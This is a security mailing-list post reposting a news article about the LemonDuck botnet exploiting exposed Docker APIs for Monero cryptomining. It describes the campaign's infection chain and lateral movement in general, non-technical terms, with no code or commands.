[BreachExchange] LemonDuck botnet plunders Docker cloud instances in cryptocurrency crime wave

Matthew Wheeler mwheeler at flashpoint-intel.com
Fri Apr 22 08:34:16 EDT 2022


https://www.zdnet.com/article/lemonduck-botnet-plunders-docker-cloud-instances-in-cryptocurrency-crime-wave/

Operators of the LemonDuck botnet are targeting Docker instances in a
cryptocurrency mining campaign.

LemonDuck is cryptocurrency mining malware wrapped up in a botnet
structure. The malware exploits older vulnerabilities to infiltrate cloud
systems and servers, including the Microsoft Exchange ProxyLogon bugs,
EternalBlue, and BlueKeep.


As noted by Microsoft's security team in 2021, the threat actors behind the
malware are known to be selective when it comes to timing and may trigger
an attack when teams are focused on "patching a popular vulnerability
rather than investigating compromise."

LemonDuck has expanded its operations from Windows machines also to include
Linux and Docker. In an ongoing, active campaign, Crowdstrike says that
Docker APIs are being targeted to obtain initial access to cloud instances.

Docker is used for running containers in the cloud. On Thursday, the
cybersecurity researchers said that LemonDuck will take advantage of
misconfigurations in instances that cause API exposure to deploying exploit
kits and load malware.

In a case observed by the team, an exposed API was abused to run a custom
Docker ENTRYPOINT instruction and download "core.png," an image file
disguised as a Bash script.

The file was downloaded from a domain in LemonDuck's "vast"
command-and-control (C2) infrastructure.

"CrowdStrike found multiple campaigns being operated via the domain
targeting Windows and Linux platforms simultaneously," the researchers
noted.

Core.png will launch a Linux cronjob inside the vulnerable container and
then download a secondary Bash file, "a.asp," the main LemonDuck payload.

The cronjob will trigger LemonDuck. The malware will first kill several
processes, including network connections, rival cryptocurrency mining
operations, and existing ties to mining pools. LemonDuck will also target
known daemons tasked with monitoring, such as Alibaba Cloud's monitoring
service.

Now the server has been prepared, a cryptocurrency mining operation begins.
XMRig used to generate Monero (XMR), is launched with a configuration set
to proxy pools -- an attempt to hide the true cryptocurrency wallet address
of the attacker.

LemonDuck doesn't stop at just one Docker instance, however. The malware
will also search for SSH keys in the file system to log into other servers
and repeat its malicious operations.

"Due to the cryptocurrency boom in recent years, combined with cloud and
container adoption in enterprises, cryptomining is proven to be a
monetarily attractive option for attackers, the researchers say. "Since
cloud and container ecosystems heavily use Linux, it drew the attention of
the operators of botnets like LemonDuck, which started targeting Docker for
cryptomining on the Linux platform."
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20220422/76a2e5de/attachment.html>


More information about the BreachExchange mailing list